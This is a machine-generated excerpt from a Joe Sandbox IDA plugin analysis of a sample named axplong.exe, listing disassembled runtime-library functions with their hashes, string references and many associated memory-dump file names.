                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: @yh
                                                                                                                                                                                                                                                    • API String ID: 1432671424-844070663
                                                                                                                                                                                                                                                    • Opcode ID: ab41224f031fa610548c4ae7089ac580ed9c6ce6db01ea5c1e788a248b6d0241
                                                                                                                                                                                                                                                    • Instruction ID: 3cf3d7ed92ac86c2dc710608310941e613d7f7fe6489d2cf5f0d6f6cd9ba240b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab41224f031fa610548c4ae7089ac580ed9c6ce6db01ea5c1e788a248b6d0241
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB31D2B29047049FDB20EF68D845A6AB7E9EF19310F200B3EF949C7341E771EA5487A5
                                                                                                                                                                                                                                                    Function 006AF21F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___free_lconv_mon
                                                                                                                                                                                                                                                    • String ID: 8"m$`'m
                                                                                                                                                                                                                                                    • API String ID: 3903695350-2741468995
                                                                                                                                                                                                                                                    • Opcode ID: adda3f481234f1c5fa6d026bca96afe7f5184fd640faa636e982018c9198f610
                                                                                                                                                                                                                                                    • Instruction ID: 635f5f2a5a7f992554cc8512613bb3b5736a343e28d72a6d2f85f26cbf42cc39
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: adda3f481234f1c5fa6d026bca96afe7f5184fd640faa636e982018c9198f610
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0D316D316002059FEB61BBF8D945B9A73EAAF42320F10452EE447D7252DF32AD80CF56
                                                                                                                                                                                                                                                    Function 00673930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 00673962
                                                                                                                                                                                                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 006739A1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_init_in_situ
                                                                                                                                                                                                                                                    • String ID: pBg
                                                                                                                                                                                                                                                    • API String ID: 3366076730-3123275838
                                                                                                                                                                                                                                                    • Opcode ID: 5abb342898c7f0d3852102e7b42d482c824ba53bf9bce1c97356604f1a235c17
                                                                                                                                                                                                                                                    • Instruction ID: 9b4546ab6add3d5eba16028c912759dc36670a1993df7afa6858da9f01f6c555
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5abb342898c7f0d3852102e7b42d482c824ba53bf9bce1c97356604f1a235c17
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA4124B0601B058FD720CF18C588B9ABBF2FF44315F10861DE96A8B341E7B4AA15CF80
                                                                                                                                                                                                                                                    Function 006ADEA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe, xrefs: 006ADEA8
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                    • API String ID: 0-2101868059
                                                                                                                                                                                                                                                    • Opcode ID: f242c15e227f05f8d81079a9bb6427e8c31bf124d76e867ab73b03c71c1235c6
                                                                                                                                                                                                                                                    • Instruction ID: e98752dfdf875ecc7fe54cf801381365182fc02b520aca5cd0a9f22456cb7e22
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f242c15e227f05f8d81079a9bb6427e8c31bf124d76e867ab73b03c71c1235c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E21A4716082497FDB60BF619C81DAB779FEF533687108518F82697A51E731EC019FA0
                                                                                                                                                                                                                                                    Function 006A1631 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 006A1691
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006A16DC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
